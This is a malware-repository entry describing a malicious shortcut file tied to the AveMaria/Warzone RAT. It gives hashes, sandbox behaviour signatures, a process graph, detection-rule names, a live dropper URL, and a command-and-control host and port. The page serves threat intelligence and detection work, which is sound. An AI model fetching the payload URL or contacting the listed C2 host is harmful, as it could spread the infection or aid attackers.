MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


AveMariaRAT


Vendor detections: 11


Intelligence 11 IOCs YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3
SHA3-384 hash: 40f2fdab7f9e9179601581cd77bf04e6636a5b64fb8199f553cce927ff9715bef9782fb17b74744139b4be0fa45735bd
SHA1 hash: 719fc7c6dcc473b84fe37e4e0764f97f2e924f99
MD5 hash: 714dabed81a0ad0bb12437d57365751d
humanhash: lamp-echo-paris-september
File name:Readme.txt.lnk
Download: download sample
Signature AveMariaRAT
Create hunting rule
File size:5'232 bytes
First seen:2023-10-02 16:36:28 UTC
Last seen:Never
File type:Shortcut (lnk) lnk
MIME type:application/octet-stream
ssdeep 12:8MMlKm/3BVSXvk44X3ojsqzKtnWNemyW+UcCsvX7CKeXRP0075vhWKDiN37+lbYH:8lp/BHYVKVWB+/CWLC7hPHarabFO
TLSH T10FB14E181FE31714D7A3D73DACBAB311C9367C56EE528F9D019192886424111F565F2F
Reporter abuse_ch
Tags:AveMariaRAT lnk remotes1338-hopto-org WarzoneRAT

Intelligence

File Origin
# of uploads :
1
# of downloads :
262
Origin country :
NL NL
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.28759.LnkHeur.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.LOLBinOddLookPSHELL.20220711.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.OddLook.202207213.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3/results/dashboard
Payload URLs
URL
File name
https://filebin.net/mtkpnk4x1g1cu6fj/Readme.txt.hta'
LNK File
Behaviour
BlacklistAPI detected
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
evasive masquerade
Link:
https://www.filescan.io/uploads/651af1b732ffdb7a7a1cf017/reports/fe661af9-2697-45cf-8672-93476536a39b/overview
Verdict:
Malicious
Labled as:
Trojan.Generic
Link:
https://www.hybrid-analysis.com/sample/70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3
Result
Verdict:
MALICIOUS
Result
Threat name:
AveMaria, UACMe, Xmrig
Create hunting rule
Detection:
malicious
Classification:
rans.phis.troj.adwa.spyw.expl.evad.mine
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1318124
Signature
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Contains functionality to check if Internet connection is working
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to hide user accounts
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates files in alternative data streams (ADS)
Creates files in the system32 config directory
Drops PE files to the document folder of the user
Drops script or batch files to the startup folder
Encrypted powershell cmdline option found
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found URL in windows shortcut file (LNK)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential dropper URLs found in powershell memory
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Drops script at startup location
Sigma detected: Execute DLL with spoofed extension
Sigma detected: Stop multiple services
Snort IDS alert for network traffic
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses powercfg.exe to modify the power settings
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Writes to foreign memory regions
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
Yara detected Xmrig cryptocurrency miner
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1318124 Sample: Readme.txt.lnk Startdate: 02/10/2023 Architecture: WINDOWS Score: 100 139 remotes1338.hopto.org 2->139 167 Snort IDS alert for network traffic 2->167 169 Found malware configuration 2->169 171 Malicious sample detected (through community Yara rule) 2->171 173 21 other signatures 2->173 13 powershell.exe 11 2->13         started        16 SecurityHealthSystray.exe 2->16         started        19 cmd.exe 2->19         started        21 6 other processes 2->21 signatures3 process4 file5 219 Powershell drops PE file 13->219 23 mshta.exe 25 13->23         started        28 conhost.exe 1 13->28         started        105 C:\Windows\Temp\upjbekjkwxxn.tmp, PE32+ 16->105 dropped 107 C:\Windows\Temp\kvlypgvvuqhz.sys, PE32+ 16->107 dropped 221 Windows shortcut file (LNK) starts blacklisted processes 16->221 223 Protects its processes via BreakOnTermination flag 16->223 225 Writes to foreign memory regions 16->225 233 4 other signatures 16->233 227 Uses powercfg.exe to modify the power settings 19->227 229 Modifies power options to not sleep / hibernate 19->229 30 conhost.exe 19->30         started        32 sc.exe 19->32         started        34 sc.exe 19->34         started        40 3 other processes 19->40 231 Creates files in the system32 config directory 21->231 36 conhost.exe 21->36         started        38 conhost.exe 21->38         started        42 14 other processes 21->42 signatures6 process7 dnsIp8 141 filebin.net 185.47.40.36, 443, 49782, 49784 REDPILL-LINPRORedpillLinproNO Norway 23->141 143 situla.bitbit.net 87.238.33.8, 443, 49783, 49787 REDPILL-LINPRORedpillLinproNO Norway 23->143 113 C:\Users\user\AppData\...\Readme.txt[1].hta, HTML 23->113 dropped 175 Windows shortcut file (LNK) starts blacklisted processes 23->175 177 Suspicious powershell command line found 23->177 179 Very long command line found 23->179 181 Adds a directory exclusion to Windows Defender 23->181 44 powershell.exe 17 29 23->44         started        file9 signatures10 process11 dnsIp12 151 filebin.net 44->151 153 87.238.33.7, 443, 49785, 49794 REDPILL-LINPRORedpillLinproNO Norway 44->153 155 situla.bitbit.net 44->155 137 C:\Users\user\AppData\...\RuntimeBroker.exe, PE32 44->137 dropped 235 Potential dropper URLs found in powershell memory 44->235 49 RuntimeBroker.exe 3 44->49         started        53 RuntimeBroker.exe 1 44->53         started        55 notepad.exe 44->55         started        57 conhost.exe 44->57         started        file13 signatures14 process15 file16 109 C:\Users\user\AppData\Local\...\updater.exe, PE32 49->109 dropped 111 C:\Users\user\...\SecurityHealthSystray.exe, PE32+ 49->111 dropped 157 Antivirus detection for dropped file 49->157 159 Windows shortcut file (LNK) starts blacklisted processes 49->159 161 Contains functionality to hide user accounts 49->161 163 Machine Learning detection for dropped file 49->163 59 updater.exe 49->59         started        63 SecurityHealthSystray.exe 49->63         started        65 powershell.exe 21 49->65         started        165 Encrypted powershell cmdline option found 53->165 67 powershell.exe 53->67         started        69 updater.exe 53->69         started        71 SecurityHealthSystray.exe 53->71         started        signatures17 process18 file19 123 C:\Users\user\Documents\updater.exe, PE32 59->123 dropped 125 C:\Users\user\...\Documents:ApplicationData, PE32 59->125 dropped 127 C:\Users\user\AppData\...\programs.bat:start, ASCII 59->127 dropped 129 C:\Users\user\AppData\...\programs.bat, ASCII 59->129 dropped 199 Antivirus detection for dropped file 59->199 201 Windows shortcut file (LNK) starts blacklisted processes 59->201 203 Multi AV Scanner detection for dropped file 59->203 213 11 other signatures 59->213 73 updater.exe 59->73         started        78 powershell.exe 59->78         started        131 C:\Users\user\AppData\...\upjbekjkwxxn.tmp, PE32+ 63->131 dropped 133 C:\...\SecurityHealthSystray.exe, PE32+ 63->133 dropped 135 C:\Windows\System32\drivers\etc\hosts, ASCII 63->135 dropped 205 Writes to foreign memory regions 63->205 207 Modifies the context of a thread in another process (thread injection) 63->207 209 Modifies the hosts file 63->209 215 2 other signatures 63->215 80 dialer.exe 63->80         started        82 conhost.exe 65->82         started        211 Contains functionality to hide user accounts 67->211 84 conhost.exe 67->84         started        signatures20 process21 dnsIp22 145 remotes1338.hopto.org 172.234.51.249, 49790, 5252, 80 AKAMAI-ASN1EU United States 73->145 147 127.0.0.1 unknown unknown 73->147 149 2 other IPs or domains 73->149 115 C:\Users\user\AppData\Roaming\akewmjqah.exe, PE32+ 73->115 dropped 117 C:\Users\user\AppData\Local\Temp\188.exe, PE32 73->117 dropped 119 C:\Users\...\SecurityHealthSystray[1].exe, PE32+ 73->119 dropped 121 2 other files (1 malicious) 73->121 dropped 183 Antivirus detection for dropped file 73->183 185 Windows shortcut file (LNK) starts blacklisted processes 73->185 187 Multi AV Scanner detection for dropped file 73->187 195 5 other signatures 73->195 86 powershell.exe 73->86         started        88 cmd.exe 73->88         started        90 conhost.exe 78->90         started        189 Contains functionality to inject code into remote processes 80->189 191 Writes to foreign memory regions 80->191 193 Allocates memory in foreign processes 80->193 197 2 other signatures 80->197 92 lsass.exe 80->92 injected 95 winlogon.exe 80->95 injected 97 svchost.exe 80->97 injected 99 2 other processes 80->99 file23 signatures24 process25 signatures26 101 conhost.exe 86->101         started        103 conhost.exe 88->103         started        217 Writes to foreign memory regions 92->217 process27
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3/
Threat name:
Shortcut.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2023-10-02 06:01:48 UTC
File Type:
Binary
AV detection:
15 of 38 (39.47%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=od2drv34kuvb5niabv27nnqcwznpbtjidsw3fycb3xbqpefmc2zq._file
Result
Malware family:
warzonerat
Create hunting rule
Score:
  10/10
Tags:
family:warzonerat evasion infostealer rat trojan
Link:
https://tria.ge/reports/231002-t4s42acg3v/
Behaviour
Creates scheduled task(s)
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Launches sc.exe
Checks computer location settings
Executes dropped EXE
Blocklisted process makes network request
Stops running service(s)
Warzone RAT payload
UAC bypass
WarzoneRat, AveMaria
Malware Config
C2 Extraction:
remotes1338.hopto.org:5252
Dropper Extraction:
https://filebin.net/mtkpnk4x1g1cu6fj/Readme.txt.hta
Malware family:
Warzone
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/70f438d77c55/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Download_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies download artefacts in shortcut (LNK) files.
Rule name:EXE_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies executable artefacts in shortcut (LNK) files.
Rule name:Long_RelativePath_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.
Rule name:PS_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name:Script_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies scripting artefacts in shortcut (LNK) files.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

AveMariaRAT

Shortcut (lnk) lnk 70f438d77c552a1eb5000d75f6b602b65af0cd281cadb2e041ddc30790ac16b3

(this sample)

  
Delivery method
Distributed via e-mail attachment

Comments